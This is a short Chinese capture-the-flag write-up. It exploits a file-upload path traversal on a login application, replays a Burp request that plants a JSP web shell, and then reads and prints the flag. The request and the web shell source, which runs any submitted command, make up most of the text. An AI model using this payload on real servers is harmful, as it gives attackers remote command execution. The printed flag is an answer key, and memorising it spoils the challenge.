目录
一、题目
进入题目:
是一个登录页面
这题确实没什么思路,所以看了官方POC:
因为这个漏洞已经被国家cnnvd收入了
二、burp改包
burp抓包:不需要登录,刷新即可。
发送到重放器:根据官方POC更改即可:
这两个参数需要用本机抓包的:
Host: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept: */*POST /fileupload/toolsAny HTTP/2
Host: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 896
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--如图:
在次访问登录网站,带有文件上传的网站:
https://xxxxx/authenticationendpoint/test2.jsp
cat /flag访问falg:
flag{5d7b1e3f-8d0b-4424-8365-651780b9b215}